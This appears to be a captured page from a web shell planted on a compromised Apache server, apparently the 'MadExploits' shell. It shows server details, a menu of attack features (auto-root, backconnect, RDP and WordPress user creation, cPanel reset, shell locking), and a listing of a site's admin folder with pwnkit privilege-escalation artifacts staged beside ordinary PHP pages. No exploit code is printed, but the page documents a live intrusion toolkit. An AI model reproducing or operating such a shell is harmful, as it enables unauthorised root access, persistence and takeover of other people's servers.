Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 13.58.199.20
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
eco-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
checkbox-radio.php
31.96
KB
-rw-r--r--
components.php
89.01
KB
-rw-r--r--
data-table.php
11.55
KB
-rw-r--r--
email-templates-alert.html
9.62
KB
-rw-r--r--
email-templates-billing.html
16.7
KB
-rw-r--r--
empty.php
722
B
-rw-r--r--
error-404.php
1.91
KB
-rw-r--r--
forgot-password.php
2.57
KB
-rw-r--r--
form-fileupload.php
7.73
KB
-rw-r--r--
form-wizard.php
41.75
KB
-rw-r--r--
index.php
9.91
KB
-rw-r--r--
invoice.php
9.76
KB
-rw-r--r--
login.php
3.38
KB
-rw-r--r--
maintenance.php
3.62
KB
-rw-r--r--
modals.php
37.59
KB
-rw-r--r--
orderhistory.php
11.41
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register.php
3.59
KB
-rw-r--r--
sweetalert.php
9.06
KB
-rw-r--r--
tables-basic.php
52.41
KB
-rw-r--r--
tables-datatable.php
30.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : error-404.php
<?php include("includes/login-reg-password-header.php");?> <div class="account-pages "> <div class="container"> <div class="row justify-content-center"> <div class="col-md-8 col-lg-6 col-xl-5"> <div class="text-center"> <a href="index.html" class="logo"> <img src="//assets/images/logo-light.png" alt="" height="22" class="logo-light mx-auto"> <img src="//assets/images/logo-dark.png" alt="" height="22" class="logo-dark mx-auto"> </a> <p class="text-muted mt-2 mb-4"></p> </div> <div class="card"> <div class="card-body p-4"> <div class="text-center"> <h1 class="text-error">404</h1> <h3 class="mt-3 mb-2">Page not Found</h3> <p class=" mb-3 normal-x">It's looking like you may have taken a wrong turn. Don't worry... it happens to the best of us. You might want to check your internet connection. Here's a little tip that might help you get back on track.</p> <a href="#" class="btn btn-danger waves-effect waves-light normal-x"><i class="fas fa-home mr-1"></i> Back to Home</a> </div> </div> </div> </div> </div> </div> <!-- end container --> </div> <!-- end page --> <?php include("includes/login-reg-password-footer.php");?>
Close